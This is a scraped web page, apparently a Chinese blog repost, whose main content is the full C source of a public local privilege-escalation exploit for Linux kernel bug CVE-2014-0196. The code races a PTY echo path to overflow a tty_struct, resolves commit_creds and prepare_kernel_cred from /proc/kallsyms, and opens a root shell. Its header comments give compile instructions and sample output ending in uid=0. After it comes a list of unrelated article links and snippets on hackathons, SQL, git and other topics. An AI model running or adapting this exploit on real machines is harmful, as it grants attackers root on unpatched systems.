/*

 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

 * condition

 *

 * Slightly-less-than-POC privilege escalation exploit

 * For kernels >= v3.14-rc1

 *

 * Matthew Daley <mattd@bugfuzz.com>

 *

 * Usage:

 *   $ gcc cve-2014-0196-md.c -lutil -lpthread

 *   $ ./a.out

 *   [+] Resolving symbols

 *   [+] Resolved commit_creds: 0xffffffff81056694

 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7

 *   [+] Doing once-off allocations

 *   [+] Attempting to overflow into a tty_struct...............

 *   [+] Got it :)

 *   # id

 *   uid=0(root) gid=0(root) groups=0(root)

 *

 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4

 * chance that the overflow will go off the end of a slab. This does not

 * necessarily lead to an immediate kernel crash, but you should be prepared

 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be

 * avoidable by reading /proc/slabinfo on systems where it is still available

 * to unprivileged users.

 *

 * Caveat: The vulnerability should be exploitable all the way from

 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in

 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer

 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this

 * exploit relies on.

 *

 * Thanks to Jon Oberheide for his help on exploitation technique.

 */

#include <sys/stat.h>

#include <sys/types.h>

#include <fcntl.h>

#include <pthread.h>

#include <pty.h>

#include <stdio.h>

#include <string.h>

#include <termios.h>

#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200

#define RUN_ALLOCS    30

struct device;

struct tty_driver;

struct tty_operations;

typedef struct {

	int counter;

} atomic_t;

struct kref {

	atomic_t refcount;

};

struct tty_struct_header {

	int	magic;

	struct kref kref;

	struct device *dev;

	struct tty_driver *driver;

	const struct tty_operations *ops;

} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;

char buf[1024] = {0};

commit_creds_fn commit_creds;

prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {

	commit_creds(prepare_kernel_cred(0));

	return 0;

}

unsigned long get_symbol(char *target_name) {

	FILE *f;

	unsigned long addr;

	char dummy;

	char name[256];

	int ret = 0;

	f = fopen("/proc/kallsyms", "r");

	if (f == NULL)

		return 0;

	while (ret != EOF) {

		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);

		if (ret == 0) {

			fscanf(f, "%s\n", name);

			continue;

		}

		if (!strcmp(name, target_name)) {

			printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

			fclose(f);

			return addr;

		}

	}

	printf("[-] Couldn't resolve \"%s\"\n", name);

	fclose(f);

	return 0;

}

void *overwrite_thread_fn(void *p) {

	write(slave_fd, buf, 511);

	write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));

	write(slave_fd, &overwrite, sizeof(overwrite));

}

int main() {

	char scratch[1024] = {0};

	void *tty_operations[64];

	int i, temp_fd_1, temp_fd_2;

	for (i = 0; i < 64; ++i)

		tty_operations[i] = payload;

	overwrite.magic                 = TTY_MAGIC;

	overwrite.kref.refcount.counter = 0x1337;

	overwrite.dev                   = (struct device *)scratch;

	overwrite.driver                = (struct tty_driver *)scratch;

	overwrite.ops                   = (struct tty_operations *)tty_operations;

	puts("[+] Resolving symbols");

	commit_creds = (commit_creds_fn)get_symbol("commit_creds");

	prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");

	if (!commit_creds || !prepare_kernel_cred)

		return 1;

	puts("[+] Doing once-off allocations");

	for (i = 0; i < ONEOFF_ALLOCS; ++i)

		if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {

			puts("[-] pty creation failed");

			return 1;

		}

	printf("[+] Attempting to overflow into a tty_struct...");

	fflush(stdout);

	for (i = 0; ; ++i) {

		struct termios t;

		int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;

		pthread_t overwrite_thread;

		if (!(i & 0xfff)) {

			putchar('.');

			fflush(stdout);

		}

		if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {

			puts("\n[-] pty creation failed");

			return 1;

		}

		for (j = 0; j < RUN_ALLOCS; ++j)

			if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {

				puts("\n[-] pty creation failed");

				return 1;

			}

		close(fds[RUN_ALLOCS / 2]);

		close(fds2[RUN_ALLOCS / 2]);

		write(slave_fd, buf, 1);

		tcgetattr(master_fd, &t);

		t.c_oflag &= ~OPOST;

		t.c_lflag |= ECHO;

		tcsetattr(master_fd, TCSANOW, &t);

		if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {

			puts("\n[-] Overwrite thread creation failed");

			return 1;

		}

		write(master_fd, "A", 1);

		pthread_join(overwrite_thread, NULL);

		for (j = 0; j < RUN_ALLOCS; ++j) {

			if (j == RUN_ALLOCS / 2)

				continue;

			ioctl(fds[j], 0xdeadbeef);

			ioctl(fds2[j], 0xdeadbeef);

			close(fds[j]);

			close(fds2[j]);

		}

		ioctl(master_fd, 0xdeadbeef);

		ioctl(slave_fd, 0xdeadbeef);

		close(master_fd);

		close(slave_fd);

		if (!setresuid(0, 0, 0)) {

			setresgid(0, 0, 0);

			puts("\n[+] Got it :)");

			execl("/bin/bash", "/bin/bash", NULL);

		}

	}

}

CVE-2014-0196(马拉松赛跑bug)的更多相关文章

  1. SegmentFault 2014黑客马拉松 北京 作品demo

    1号作品展示——最熟悉的陌生人 app 利用录音(声纹识别)和照片来让好久不见的见面变得不那么尴尬. 2号作品展示——神奇魔镜 app 灵感来自通话<白雪公主>,穿越到今天的“魔镜”功能依 ...

  2. 洛谷P3113 [USACO14DEC]马拉松赛跑Marathon_Gold 线段树维护区间最大值 模板

    如此之裸- Code: #include<cstdio> #include<cstring> #include<cmath> #include<algorit ...

  3. 【独家】K8S漏洞报告 | 近期bug fix解读

    安全漏洞CVE-2019-3874分析 Kubernetes近期重要bug fix分析 Kubernetes v1.13.5 bug fix数据分析 ——本周更新内容 安全漏洞CVE-2019-387 ...

  4. Bash漏洞批量检测工具与修复方案

    &amp;amp;lt;img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" t ...

  5. Daily record-August

    August11. A guide dog can guide a blind person. 导盲犬能给盲人引路.2. A guide dog is a dog especially trained ...

  6. 你真的会玩SQL吗?表表达式,排名函数

    你真的会玩SQL吗?系列目录 你真的会玩SQL吗?之逻辑查询处理阶段 你真的会玩SQL吗?和平大使 内连接.外连接 你真的会玩SQL吗?三范式.数据完整性 你真的会玩SQL吗?查询指定节点及其所有父节 ...

  7. [译]git log进阶

    格式化log输出 oneline --oneline标记将每个commit压缩成一行. 默认情况下显示一个commit ID和commit描述的第一行. 输出如下: 0e25143 Merge bra ...

  8. RFID应用范围

    RFID应用范围 (1)物流: 物流过程中的货物追踪,信息自动采集,仓储应用,港口应用,邮政,快递 (2)零售: 商品的销售数据实时统计,补货,防盗 (3)制造业: 生产数据的实时监控,质量追踪,自动 ...

  9. Android安全研究经验谈

    安全研究做什么 从攻击角度举例,可以是:对某个模块进行漏洞挖掘的方法,对某个漏洞进行利用的技术,通过逆向工程破解程序.解密数据,对系统或应用进行感染.劫持等破坏安全性的攻击技术等. 而防御上则是:查杀 ...

随机推荐

  1. StringBuilder - new line.

    //use this to implement platform-cross new-line. StringBuilder sb = new StringBuilder(); sb.append(S ...

  2. c++builder向c#开发的webservice传递非数字参数

    一.引用WebService地址 BCB6.0环境下,File-New-Other-WebService-WSDL Importer.然后手动写完整地址.如:“http://192.168.1.3:1 ...

  3. php 实用函数

    第一次随笔,写一些自己工作当中比较实用的函数吧. 数组函数: 1 array_column --返回数组当中指定的一列 用法一:返回数组当中指定的一列 应用场景:取出全班同学的id,去其他表查询这些同 ...

  4. 超级易使用的jquery视频背景插件Vide

    http://www.jqcool.net/demo/201410/jquery-vide/ 官网: http://vodkabears.github.io/vide/

  5. Linux socket编程 DNS查询IP地址

    本来是一次计算机网络的实验,但是还没有完全写好,DNS的响应请求报文的冗余信息太多了,不只有IP地址.所以这次的实验主要就是解析DNS报文.同时也需要正确的填充请求报文.如果代码有什么bug,欢迎指正 ...

  6. 【新手--android日记】实现IOS风格电话界面

    [前言--新手日记] 开始学习android开发,通过做一个通讯录练习,打算实现各种自己想实现的功能. 新手作品,技术含量很浅.主要是记录自己的学习过程. 纯学习之用,求评论,求建议,求教导. [正题 ...

  7. bzoj2534: Uva10829L-gap字符串

    Description 有一种形如uvu形式的字符串,其中u是非空字符串,且V的长度正好为L,那么称这个字符串为L-Gap字符串 给出一个字符串S,以及一个正整数L,问S中有多少个L-Gap子串. I ...

  8. codeforces 235 B. Let's Play Osu!

    You're playing a game called Osu! Here's a simplified version of it. There are n clicks in a game. F ...

  9. TProcedure,TMethod,TNotifyEvent,TWndMethod的区别,并模拟点击按钮后发生的动作

    忽然发现TProcedure和TNotifEvent的区别还挺大的: procedure TForm1.Button2Click(Sender: TObject); begin ShowMessage ...

  10. 【转】带checkbox的ListView实现(二)——自定义Checkable控件的实现方法

    原文网址:http://blog.csdn.net/harvic880925/article/details/40475367 前言:前一篇文章给大家展示了传统的Listview的写法,但有的时候我们 ...